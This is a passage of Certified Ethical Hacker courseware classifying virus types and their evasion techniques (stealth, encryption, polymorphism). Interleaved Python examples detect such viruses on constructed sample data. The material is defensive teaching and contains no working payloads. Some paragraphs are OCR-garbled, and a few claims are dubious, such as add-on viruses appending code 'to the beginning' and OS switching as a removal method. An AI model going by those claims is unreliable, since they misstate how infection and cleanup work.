- Malware Analysis
- Countermeasures
- Penetration Testing

Module Flow

Prior to this, we have discussed viruses and worms. Now we will discuss different types of viruses.

This section describes different types of viruses.


Types of Viruses

- System or Boot Sector Viruses
- Stealth Virus / Tunneling Virus
- Encryption
- Polymorphic
- Metamorphic
- Cluster Viruses
- Sparse Infector Virus
- Multipartite
- Direct Action or Transient

Types of Viruses

So far, we have discussed various virus and worm concepts. Now we will discuss various types of viruses.

This section highlights various types of viruses and worms such as file and multipartite viruses, macro viruses, cluster viruses, stealth/tunneling viruses, encryption viruses, metamorphic viruses, shell viruses, and so on. Computer viruses are the malicious software programs written by attackers to intentionally enter the targeted system without the user's permission. As a result, they affect the security system and performance of the machine. A few of the most common types of computer viruses that adversely affect security systems are discussed in detail on the following slides.

Types of Viruses

Viruses are classified depending on two categories:

- What Do They Infect?
- How Do They Infect?


What Do They Infect?

System or Boot Sector Viruses: The most common targets for a virus are the system sectors, which are nothing but the Master Boot Record and the DOS Boot Record system sectors. These are the areas on the disk that are executed when the PC is booted. Every disk has a system sector of some sort. They specially infect the floppy boot sectors and records of the hard disk. For example: Disk Killer and Stone virus.

File Viruses: Executable files are infected by file viruses, as they insert their code into the original file and get executed. File viruses are larger in number, but they are not the most commonly found. They infect in a variety of ways and can be found in a large number of file types.

Multipartite Virus: They infect program files, and this file in turn affects the boot sectors; examples are Invader, Flip, and Tequila.

Cluster Viruses: Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program.

Macro Virus: Microsoft Word or a similar application can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else. Macro viruses are somewhat less harmful than other types. They are usually spread via an email.

How Do They Infect?

Stealth Viruses: These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.

Tunneling Viruses: These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.


Encryption Viruses: This type of virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption.
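An added illustration, not from the module, of why the constant decryption module is the detection handle: four generations of a constructed sample share one decryptor stub while their encrypted bodies all differ, so a signature on the body misses every one, while a signature on the decryptor (with the key byte wildcarded) or a decrypt-then-scan pass catches them all. The body and the decryptor are constructed byte strings standing in for code, not code.

```python
"""Detecting an encryption virus through its invariant decryption module.

Added example, not part of the EC-Council module. PLAIN_BODY and the
DECRYPTOR_* bytes are constructed stand-ins, not executable code.
"""

# Constructed stand-in for the virus body that the author wants to hide.
PLAIN_BODY = b"CONSTRUCTED-SAMPLE-BODY:this text stands in for the virus body"

# Constructed stand-in for the decryption module: fixed bytes around the key.
# In a real specimen this is machine code; only its invariance matters here.
DECRYPTOR_PREFIX = b"DECRYPT:key="
DECRYPTOR_SUFFIX = b";"


def xor(data, key):
    """Single-byte XOR; applying it twice with the same key restores data."""
    return bytes(b ^ key for b in data)


def make_sample(key):
    """Build one generation: constant decryptor + body encrypted under key."""
    assert 0 < key < 256
    return DECRYPTOR_PREFIX + bytes([key]) + DECRYPTOR_SUFFIX + xor(PLAIN_BODY, key)


def split_sample(sample):
    """Recover (key, encrypted_body) by reading the decryptor's key byte."""
    assert sample.startswith(DECRYPTOR_PREFIX)
    key = sample[len(DECRYPTOR_PREFIX)]
    body = sample[len(DECRYPTOR_PREFIX) + 1 + len(DECRYPTOR_SUFFIX):]
    return key, body


def body_signature_hits(samples, signature=PLAIN_BODY[:16]):
    """Naive scanner: look for a plaintext body signature in the raw bytes.
    Every generation is encrypted under a different key, so this finds nothing."""
    return sum(1 for s in samples if signature in s)


def decryptor_signature_hits(samples):
    """Scanner keyed on the invariant decryptor bytes; the key byte is wildcarded."""
    hits = 0
    for s in samples:
        i = s.find(DECRYPTOR_PREFIX)
        if i != -1 and s[i + len(DECRYPTOR_PREFIX) + 1:].startswith(DECRYPTOR_SUFFIX):
            hits += 1
    return hits


def emulated_hits(samples, signature=PLAIN_BODY[:16]):
    """Scanner that applies the decryptor first (as an AV emulator does) and
    then matches the body signature on the decrypted bytes."""
    hits = 0
    for s in samples:
        key, body = split_sample(s)
        if signature in xor(body, key):
            hits += 1
    return hits


def demo(keys=(0x21, 0x5A, 0x9C, 0xE7)):
    """Four generations under four keys; compare the three scanning strategies."""
    samples = [make_sample(k) for k in keys]
    distinct_bodies = len({split_sample(s)[1] for s in samples})
    return {
        "samples": len(samples),
        "distinct_encrypted_bodies": distinct_bodies,
        "body_signature_hits": body_signature_hits(samples),
        "decryptor_signature_hits": decryptor_signature_hits(samples),
        "emulated_hits": emulated_hits(samples),
    }


if __name__ == "__main__":
    print(demo())
```

The same reasoning is why the polymorphic viruses discussed next go a step further and vary the decryptor itself, which forces scanners toward emulation rather than byte signatures.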

iri) P o l y m o r p h i c V i r u s e s
, T h e s e v iru s e s w e r e d e v e lo p e d t o c o n f u s e a n t i v i r u s p r o g r a m s t h a t scan f o r v iru s e s in t h e s y s te m . It is d i f f i c u l t t o t r a c e t h e m , since t h e y c h a n g e t h e i r c h a r a c te r is t ic s e a ch t i m e t h e y in f e c t, e.g., e v e r y c o p y o f t h is v ir u s d if f e r s f r o m its p r e v io u s o n e . V i r u s d e v e l o p e r s h a v e e v e n c r e a t e d m e t a m o r p h i c e n g in e s a n d v ir u s w r i t i n g t o o l k its t h a t m a k e t h e c o d e o f an e x is t in g v ir u s lo o k d i f f e r e n t f r o m o t h e r s o f its k in d . M e ta m o r p h ic V iru s e s A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . T his t e c h n i q u e , in w h i c h t h e o rig in a l a l g o r i t h m r e m a in s in t a c t, is u sed t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . T his is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v iru s c o n s is ts o f c o m p le x e x te n s iv e c o d e . O v e r w r it in g F ile o r C a v ity V iru s e s S o m e p r o g r a m file s h a v e a re as o f e m p t y space. T his e m p t y sp ace is t h e m a in t a r g e t o f th e s e viru s e s . T h e C a v i t y V ir u s , also k n o w n as t h e S pace F ille r V ir u s , s to r e s its c o d e in th is e m p t y space. T h e v ir u s in s ta lls it s e lf in th is u n o c c u p ie d sp ace w i t h o u t a n y d e s t r u c t io n t o t h e o rig in a l c o d e . It in s ta lls it s e lf in t h e file it a t t e m p t s t o in f e c t. S p a rs e In fe c to r V iru s e s

A sparse infector virus infects only occasionally (e.g., every tenth program executed) or only files whose lengths fall within a narrow range.

Companion Viruses

The companion virus stores itself by having the identical file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified.

Camouflage Viruses

They disguise themselves as genuine applications of the user. These viruses are not difficult to find since antivirus programs have advanced to the point where such viruses are easily traced.

Shell Viruses

This virus code forms a layer around the target host program's code that can be

M o d u le 0 7 P ag e 1036

Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

compared to an "eggshell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.

File Extension Viruses

File extension viruses change the extensions of files; .TXT is safe, as it indicates a pure text file. If your computer's file extensions view is turned off and someone sends you a file named BAD.TXT.VBS, you will see only BAD.TXT.

Add-on Viruses

Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus, the virus corrupts the startup information of the host code, and places itself in its place, but it does not touch the host code. However, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.

Intrusive Viruses

This form of virus overwrites its code either by completely removing the target host's

program code, or sometimes it only overwrites part of it. Therefore, the original code is not executed properly.

Direct Action or Transient Viruses

Transfers all controls to the host code where it resides, selects the target program to be modified, and corrupts it.

Terminate and Stay Resident Viruses (TSRs)

A TSR virus remains permanently in memory during the entire work session, even after the target host program is executed and terminated. It can be removed only by rebooting the system.
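The BAD.TXT.VBS case above is easy to check for mechanically. The following is an added example, not code from the CEH module: it models what a file listing shows when the last extension is hidden and flags names whose real (last) extension executes while the visible one looks like data. The extension sets are illustrative assumptions, not a complete list of Windows file types.

```python
# Added example (not from the CEH module): how a double extension such as
# BAD.TXT.VBS is displayed when a file browser hides extensions for known
# file types, and a check that flags the mismatch for review.
# Extension sets are illustrative assumptions, not a complete list.
import os

# Extensions that run as programs or scripts when opened (illustrative).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse",
                   ".wsf", ".wsh", ".scr", ".pif", ".ps1", ".hta"}
# Extensions a user would consider harmless data (illustrative).
DATA_EXTS = {".txt", ".pdf", ".doc", ".docx", ".jpg", ".png", ".xls", ".xlsx"}


def displayed_name(filename: str, hide_known_extensions: bool = True) -> str:
    """Name as shown in a listing. With extensions hidden, only the LAST
    extension is dropped, so 'BAD.TXT.VBS' is displayed as 'BAD.TXT'."""
    if not hide_known_extensions:
        return filename
    stem, ext = os.path.splitext(filename)
    return stem if ext else filename


def real_extension(filename: str) -> str:
    """The extension the operating system actually acts on (the last one)."""
    return os.path.splitext(filename)[1].lower()


def is_disguised_executable(filename: str) -> bool:
    """True when the file executes (last extension) but would be displayed
    with a data-looking extension once the real one is hidden."""
    if real_extension(filename) not in EXECUTABLE_EXTS:
        return False
    shown_ext = os.path.splitext(displayed_name(filename))[1].lower()
    return shown_ext in DATA_EXTS


def audit_listing(names):
    """Return the subset of names that should be flagged for review."""
    return [n for n in names if is_disguised_executable(n)]


if __name__ == "__main__":
    # Constructed sample listing for the example.
    sample = ["BAD.TXT.VBS", "report.pdf.exe", "notes.txt", "setup.exe", "photo.jpg"]
    for n in sample:
        print(f"{n:16} shown as {displayed_name(n):12} "
              f"flagged={is_disguised_executable(n)}")
```

The check deliberately keys on the last extension only, because that is the one the shell uses to pick a handler; a plain `setup.exe` is not flagged, since hiding its extension leaves nothing misleading behind.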


System or Boot Sector Viruses

Boot Sector Virus Execution

- Boot sector virus moves MBR to another location on the hard disk and copies itself to the original location of MBR
- When system boots, virus code is executed first and then control is passed to original MBR

Slide figure: Before Infection / After Infection, showing the Virus Code and the MBR.

System or Boot Sector Viruses

System sector viruses can be defined as those that affect the executable code of the disk, rather than the boot sector virus that affects the DOS boot sector of the disk. Any system is divided into areas, called sectors, where the programs are stored. The two types of system sectors are:

- MBR (Master Boot Record): MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost.
- DBR (DOS Boot Record): The DOS boot sector is executed whenever the system is booted. This is the crucial point of attack for viruses.

The system sector consists of 512 bytes of memory. Because of this, system sector viruses conceal their code in some other disk space. The main carrier of system sector viruses is the floppy disk. These viruses generally reside in the memory. They can also be caused by Trojans. Some sector viruses also spread through infected files, and they are called multipart viruses.


Virus Removal

System sector viruses are designed to create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows operating system, and switch to Linux or Macs, because Windows is more prone to these attacks. Linux and Macintosh have a built-in safeguard to protect against these viruses. The other way is to carry out antivirus checks on a periodic basis.
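Periodic checking of the 512-byte system sector, as recommended above, comes down to parsing the MBR and comparing its boot code against a known-good record. The following is an added example, not code from the CEH module: it decodes the classic MBR layout (446 bytes of boot code, four 16-byte partition entries, the 0x55AA signature), hashes the boot-code region, and reports any drift from a baseline. The MBR images and the baseline hash are constructed inline for the example; on a real system the baseline would be recorded from a clean install and stored off-host.

```python
# Added example (not from the CEH module): parse a 512-byte MBR, verify its
# 0x55AA boot signature, and compare the boot-code region against a trusted
# baseline hash. The MBR images below are constructed for the example.
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446          # bytes 0..445: boot loader code
PARTITION_TABLE_OFF = 446    # four 16-byte partition entries follow
SIGNATURE_OFF = 510          # 0x55 0xAA


def parse_partition_entry(entry: bytes) -> dict:
    """Decode one 16-byte MBR partition entry (classic layout)."""
    status, _chs_start, ptype, _chs_end, lba_start, sectors = struct.unpack(
        "<B3sB3sII", entry)
    return {"bootable": status == 0x80, "type": ptype,
            "lba_start": lba_start, "sectors": sectors}


def parse_mbr(sector: bytes) -> dict:
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    sig = sector[SIGNATURE_OFF:SIGNATURE_OFF + 2]
    parts = []
    for i in range(4):
        off = PARTITION_TABLE_OFF + 16 * i
        parts.append(parse_partition_entry(sector[off:off + 16]))
    return {"signature_ok": sig == b"\x55\xAA",
            "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
            "partitions": [p for p in parts if p["type"] != 0]}


def check_against_baseline(sector: bytes, baseline_sha256: str) -> list:
    """Return a list of findings; an empty list means the MBR matches the baseline."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if info["boot_code_sha256"] != baseline_sha256:
        findings.append("boot code differs from baseline (possible boot sector infection)")
    return findings


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed MBR: given boot code, one bootable NTFS-type partition, valid signature."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07,
                        b"\x00\x00\x00", 2048, 204800)
    table = entry + b"\x00" * 48          # remaining three entries unused
    return code + table + b"\x55\xAA"


# Constructed clean image and the baseline hash recorded from it.
CLEAN_MBR = build_sample_mbr(b"\xEB\x3C\x90CLEAN-LOADER")
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]
# Same partition table and signature, but the boot code has been replaced (constructed).
MODIFIED_MBR = build_sample_mbr(b"\xEB\x3C\x90OTHER-LOADER")

if __name__ == "__main__":
    print("clean:   ", check_against_baseline(CLEAN_MBR, BASELINE))
    print("modified:", check_against_baseline(MODIFIED_MBR, BASELINE))
```

Note that the partition table in the modified image is untouched and the signature is still valid, which is exactly the case the page describes (virus code in place of the MBR, original MBR moved elsewhere); only the hash of the boot-code region exposes it.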


FIGURE 7.6: System or Boot Sector Viruses. Labels: Before Infection; After Infection; Virus Code.


File and Multipartite Viruses

File Viruses

File viruses infect files that are executed or interpreted in the system such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be either direct-action (non-resident) or memory-resident. Overwriting viruses cause irreversible damage to the files. These viruses mainly target a range of operating systems that include Windows, UNIX, DOS, and Macintosh.

Characterizing File Viruses

File viruses are mainly characterized and described based on their physical behavior or characteristics. One way to classify a file virus is by the type of file targeted by it, such as EXE or COM files, the boot sector, etc. A file virus can also be characterized based on how it infects the targeted file (also known as the host file):

- Prepending: writes itself into the beginning of the host file's code
- Appending: writes itself to the end of the host file
- Overwriting: overwrites the host file's code with its own code
- Inserting: inserts itself into gaps inside the host file's code


- Companion: renames the original file and writes itself with the host file's name
- Cavity infector: writes itself between file sections of a 32-bit file

File viruses are also classified based on whether they are non-memory resident or memory resident. Non-memory resident viruses search for EXE files on a hard drive and then infect them, whereas memory resident viruses stay actively in memory and trap one or more system functions. File viruses are said to be polymorphic, encrypted, or non-encrypted. A polymorphic or encrypted virus contains one or more decryptors and a main code. The main virus code is decrypted by the decryptor before it starts. An encrypted virus usually uses variable or fixed key decryptors, whereas polymorphic viruses have decryptors that are randomly generated from processor instructions and that consist of a lot of commands that are not used in the decryption process.

Execution of Payload:

- Direct action: Immediately upon execution
- Time bomb: After a specified period of time
- Condition triggered: Only under certain conditions

Multipartite Viruses

A multipartite virus is also known as a multi-part virus that attempts to attack both the boot sector and the executable or program files at the same time. When the virus is attached to the boot sector, it will in turn affect the system files, and then the virus attaches to the files, and this time it will in turn infect the boot sector.

FIGURE 7 .7 : File a n d M u lt ip a r tite V iru se s


Macro Viruses

Infects Macro Enabled Documents

- Most macro viruses are written using the macro language Visual Basic for Applications (VBA)
- Macro viruses infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files

Macro Viruses

Microsoft Word or similar applications can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else happens. Most macro viruses are written using the macro language Visual Basic for Applications (VBA) and they infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files. Macro viruses are somewhat less harmful than other types. They are usually spread via an email. Pure data files do not allow the spread of viruses, but sometimes the line between a data file and an executable file is easily overlooked by the average user due to the extensive macro languages in some programs. In most cases, just to make things easy for users, the line between a data file and a program starts to blur only in cases where the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit common programs with macro capability such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code. In addition, the latest exploited macro code exists in the full version of the Acrobat program that reads and writes PDF files.
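The blurred line between "data file" and "program" described above can be checked at the mail gateway or on a file share by looking inside the document rather than trusting its name. The following is an added example, not code from the CEH module: for Office Open XML documents (which are zip containers) it looks for the VBA storage part and the macro-enabled content type, and flags a document whose extension does not admit that it carries macros. The two documents are constructed minimal zips built inline for the example, not real Office files; the part name `word/vbaProject.bin` and the `[Content_Types].xml` entries follow the OOXML conventions.

```python
# Added example (not from the CEH module): detect VBA macro storage inside an
# Office Open XML document and flag a mismatch between the file extension and
# the macro-enabled content. The documents below are constructed minimal zips.
import io
import os
import zipfile

MACRO_PART_SUFFIX = "vbaProject.bin"          # VBA project storage part
MACRO_ENABLED_EXTS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm"}
MACRO_CONTENT_TYPE = "macroEnabled"           # substring of the macro-enabled main part type


def inspect_ooxml(data: bytes, filename: str) -> dict:
    """Return which macro indicators are present and whether the name hides them."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        macro_parts = [n for n in names if n.endswith(MACRO_PART_SUFFIX)]
        types_xml = ""
        if "[Content_Types].xml" in names:
            types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    ext = os.path.splitext(filename)[1].lower()
    has_macros = bool(macro_parts) or (MACRO_CONTENT_TYPE in types_xml)
    return {
        "macro_parts": macro_parts,
        "macro_enabled_content_type": MACRO_CONTENT_TYPE in types_xml,
        "has_macros": has_macros,
        # VBA inside a file named as a plain document deserves a closer look.
        "extension_mismatch": has_macros and ext not in MACRO_ENABLED_EXTS,
    }


def build_doc(with_macros: bool) -> bytes:
    """Constructed minimal OOXML-style zip for the example (not a real Word file)."""
    if with_macros:
        main_ct = "application/vnd.ms-word.document.macroEnabled.main+xml"
    else:
        main_ct = ("application/vnd.openxmlformats-officedocument."
                   "wordprocessingml.document.main+xml")
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
    )
    if with_macros:
        content_types += ('<Override PartName="/word/vbaProject.bin" '
                          'ContentType="application/vnd.ms-office.vbaProject"/>')
    content_types += "</Types>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            zf.writestr("word/vbaProject.bin", b"CONSTRUCTED-VBA-STORAGE")
    return buf.getvalue()


CLEAN_DOC = build_doc(False)     # constructed
MACRO_DOC = build_doc(True)      # constructed

if __name__ == "__main__":
    print(inspect_ooxml(CLEAN_DOC, "quarterly.docx"))
    print(inspect_ooxml(MACRO_DOC, "quarterly.docm"))   # honest macro-enabled name
    print(inspect_ooxml(MACRO_DOC, "quarterly.docx"))   # VBA behind a plain-looking name
```

The legacy binary formats (.doc, .xls) store VBA in an OLE compound file instead, so this zip-based check does not cover them; the principle is the same, but a different parser is needed.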


FIGURE 7.8: Macro Viruses. Labels: Attacker; User; Infects Macro Enabled Documents.


Cluster Viruses

- Cluster viruses modify directory table entries so that they point users or system processes to the virus code instead of the actual program
- Virus Copy: There is only one copy of the virus on the disk infecting all the programs in the computer system
- Launch Itself: It will launch itself first when any program on the computer system is started and then the control is passed to the actual program

Cluster Viruses

Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program. When a program is run under DOS, it first loads and executes the virus code, and then the virus locates the actual program and executes it. Dir-2 is an example of this type of virus. Cluster viruses modify directory table entries so that directory entries point to the virus code. There is only one copy of the virus on the disk infecting all the programs in the computer system. It will launch itself first when any program on the computer system is started and then the control is passed to the actual program.
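Because a cluster virus keeps a single copy of itself and only redirects directory entries, the tell-tale sign on disk is many executables whose directory entries share the same starting cluster. The following is an added example, not code from the CEH module: it decodes classic 32-byte FAT 8.3 directory entries (start cluster at offsets 20 and 26, size at offset 28) and reports any start cluster claimed by more than one file. The directory image is constructed inline for the example; the file names and cluster numbers are invented.

```python
# Added example (not from the CEH module): flag FAT directory entries that
# share a starting cluster, the on-disk symptom of a Dir-2-style cluster
# virus. All directory entries below are constructed for the example.
import struct
from collections import defaultdict

ENTRY_SIZE = 32
ATTR_VOLUME_ID = 0x08
ATTR_DIRECTORY = 0x10


def parse_dir_entry(raw: bytes) -> dict:
    """Decode the fields of one 8.3 FAT directory entry that this check needs."""
    name = raw[0:8].decode("ascii").rstrip()
    ext = raw[8:11].decode("ascii").rstrip()
    attr = raw[11]
    cluster_hi, = struct.unpack_from("<H", raw, 20)   # high word (FAT32); zero on FAT12/16
    cluster_lo, = struct.unpack_from("<H", raw, 26)   # low word of the first cluster
    size, = struct.unpack_from("<I", raw, 28)
    return {"name": f"{name}.{ext}" if ext else name, "attr": attr,
            "start_cluster": (cluster_hi << 16) | cluster_lo, "size": size}


def parse_directory(data: bytes) -> list:
    """Walk a raw directory region and return its live, plain-file entries."""
    entries = []
    for off in range(0, len(data) - ENTRY_SIZE + 1, ENTRY_SIZE):
        raw = data[off:off + ENTRY_SIZE]
        if raw[0] == 0x00:            # end-of-directory marker
            break
        if raw[0] == 0xE5:            # deleted entry
            continue
        entry = parse_dir_entry(raw)
        if entry["attr"] & (ATTR_DIRECTORY | ATTR_VOLUME_ID):
            continue
        entries.append(entry)
    return entries


def shared_start_clusters(entries: list) -> dict:
    """Map start cluster -> file names, for clusters referenced by more than one file."""
    by_cluster = defaultdict(list)
    for e in entries:
        if e["start_cluster"] != 0:   # zero-length files own no cluster
            by_cluster[e["start_cluster"]].append(e["name"])
    return {c: names for c, names in by_cluster.items() if len(names) > 1}


def audit_directory(data: bytes) -> dict:
    return shared_start_clusters(parse_directory(data))


def make_entry(name: str, ext: str, start_cluster: int, size: int, attr: int = 0x20) -> bytes:
    """Constructed directory entry; timestamp fields are left zero."""
    raw = bytearray(ENTRY_SIZE)
    raw[0:8] = name.ljust(8).encode("ascii")
    raw[8:11] = ext.ljust(3).encode("ascii")
    raw[11] = attr
    struct.pack_into("<H", raw, 20, start_cluster >> 16)
    struct.pack_into("<H", raw, 26, start_cluster & 0xFFFF)
    struct.pack_into("<I", raw, 28, size)
    return bytes(raw)


# Constructed directory: three executables all redirected to cluster 900, one clean file.
SAMPLE_DIR = b"".join([
    make_entry("FORMAT", "COM", 900, 22717),
    make_entry("EDIT", "COM", 900, 413),
    make_entry("README", "TXT", 120, 1024),
    make_entry("CHKDSK", "EXE", 900, 16200),
]) + b"\x00" * ENTRY_SIZE

if __name__ == "__main__":
    for cluster, names in audit_directory(SAMPLE_DIR).items():
        print(f"cluster {cluster} shared by: {', '.join(names)}")
```

A clean volume can legitimately show a shared start cluster only in odd cases (for instance cross-linked files after a crash), so a hit is a reason to check the FAT chain and the file contents, not a verdict on its own.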


Stealth/Tunneling Viruses

- These viruses evade the antivirus software by intercepting its requests to the operating system
- A virus can hide itself by intercepting the antivirus software's request to read the file and passing the request to the virus, instead of the OS
- The virus can then return an uninfected version of the file to the antivirus software, so that it appears as if the file is "clean"

Stealth/Tunneling Viruses

Stealth Viruses

These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code. The stealth virus hides itself from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other drive of the system, thus replacing the infected file with the uninfected file that is stored on the hard drive. A stealth virus hides the modifications that it makes. It takes control of the system's functions that read files or system sectors and, when another program requests information that has already been modified by the virus, the stealth virus reports the unmodified information to the requesting program instead. This virus also resides in the memory. To avoid detection, these viruses always take over system functions and use them to hide their presence.


One of the carriers of the stealth virus is the rootkit. Installing a rootkit generally results in this virus attack because rootkits are installed via Trojans, and thus are capable of hiding any malware.

Removal:

- Always do a cold boot (boot from write-protected floppy disk or CD)
- Never use DOS commands such as FDISK to fix the virus
- Use antivirus software

Tunneling Viruses

These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.

FIGURE 7.9: Working of Stealth/Tunneling Viruses. The antivirus software asks "Give me the system file tcpip.sys"; the virus hides the infected TCPIP.SYS and answers "Here you go" with the original TCPIP.SYS.


Encryption Viruses

- This type of virus uses simple encryption to encipher the code
- The virus is encrypted with a different key for each infected file
- AV scanners cannot directly detect these types of viruses using signature detection methods

Encryption Viruses

This type of virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption. These viruses generally employ XOR on each byte with a randomized key. The virus is enciphered with an encryption key; the resulting infected file consists of a decryption module and an encrypted copy of the code.

- For each infected file, the virus is encrypted by using a different combination of keys, but the decrypting module part remains unchanged. It is not possible for the virus scanner to directly detect the virus by means of signatures, but the decrypting module can be detected.
- The decryption technique employed is XOR of each byte with a randomized key that is generated and saved by the root virus.
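The two points above (the body cannot be matched by a signature, but the constant decryptor can) are easy to see on constructed data, and they also show what a scanner does next: because the "encryption" is a single-byte XOR, an analyst can try all 256 keys and scan the decrypted body directly, a technique AV engines have long applied to this class of virus. The following is an added example, not code from the CEH module. Every byte string in it is a placeholder; the file layout (key byte, constant stub, XOR-encrypted body) is an assumption made for the example, and the stub and body contain no program code.

```python
# Added example (not from the CEH module): why a body signature fails against
# an encrypted virus while a signature on the constant decryptor stub still
# works, and how an analyst recovers a single-byte XOR key to scan the body.
# All byte strings are constructed placeholders, not real virus code.
from typing import Optional

# Constructed: the part that stays constant across infections (the "decryptor").
STUB = b"\xEB\x10DECRYPT-LOOP-PLACEHOLDER\xC3"
# Constructed: the plaintext "body" every sample carries once decrypted.
BODY = b"CONSTRUCTED-SAMPLE-BODY-MARKER:placeholder-text"
BODY_SIGNATURE = b"SAMPLE-BODY-MARKER"     # what a body signature would match on
STUB_SIGNATURE = b"DECRYPT-LOOP"           # what a decryptor signature would match on


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_sample(key: int) -> bytes:
    """Constructed infected-file layout: key byte, constant stub, XOR-encrypted body."""
    return bytes([key]) + STUB + xor_bytes(BODY, key)


def body_signature_hits(sample: bytes) -> bool:
    """Plain signature scan of the raw bytes: misses unless the key happens to be 0."""
    return BODY_SIGNATURE in sample


def stub_signature_hits(sample: bytes) -> bool:
    """Signature on the unchanging decryptor: matches for every key."""
    return STUB_SIGNATURE in sample


def recover_xor_key(encrypted: bytes, known_plaintext: bytes) -> Optional[int]:
    """Try all 256 single-byte keys; return the one that exposes the known text."""
    for key in range(256):
        if known_plaintext in xor_bytes(encrypted, key):
            return key
    return None


def xray_scan(sample: bytes) -> dict:
    """Two-stage scan: find the constant stub, then undo the single-byte XOR
    (the assumed layout) and confirm the body signature on the decrypted bytes."""
    if not stub_signature_hits(sample):
        return {"stub_found": False, "key": None, "body_confirmed": False}
    encrypted_body = sample[1 + len(STUB):]
    key = recover_xor_key(encrypted_body, BODY_SIGNATURE)
    return {"stub_found": True, "key": key, "body_confirmed": key is not None}


if __name__ == "__main__":
    for key in (0x5A, 0x3C, 0xA7):
        s = make_sample(key)
        print(f"key=0x{key:02X} raw-body-sig={body_signature_hits(s)} "
              f"stub-sig={stub_signature_hits(s)} xray={xray_scan(s)}")
```

The second stage is what makes the stub signature useful rather than just a hint: a stub match alone could be a false positive from a legitimate packer, while a body match after key recovery identifies the family.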


FIGURE 7.10: Working of Encryption Viruses. Labels: Virus Code; Encryption Virus 1; Encryption Virus 2; Encryption Virus 3.


Polymorphic Code

- Polymorphic code is code that mutates while keeping the original algorithm intact
- To enable polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine)
- A well-written polymorphic virus therefore has no parts that stay the same on each infection

Polymorphic Code

Polymorphic viruses modify their code for each replication in order to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. A random number generator is used for implementing polymorphism. A mutation engine is generally used to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic codes are used to prevent antivirus professionals from accessing the codes. Virus samples, which are bait files infected after a single execution, contain a similar copy of the virus. A simple integrity checker is used to detect the presence of a polymorphic virus in the system's disk.


FIGURE 7.11: How Polymorphic Code Works. Labels: Encrypted Mutation Engine (EME); Encrypted Virus Code; Decryptor Routine (decrypts virus code and mutation engine); User Runs an Infected Program; Virus Does the Damage; New Polymorphic Virus; RAM.

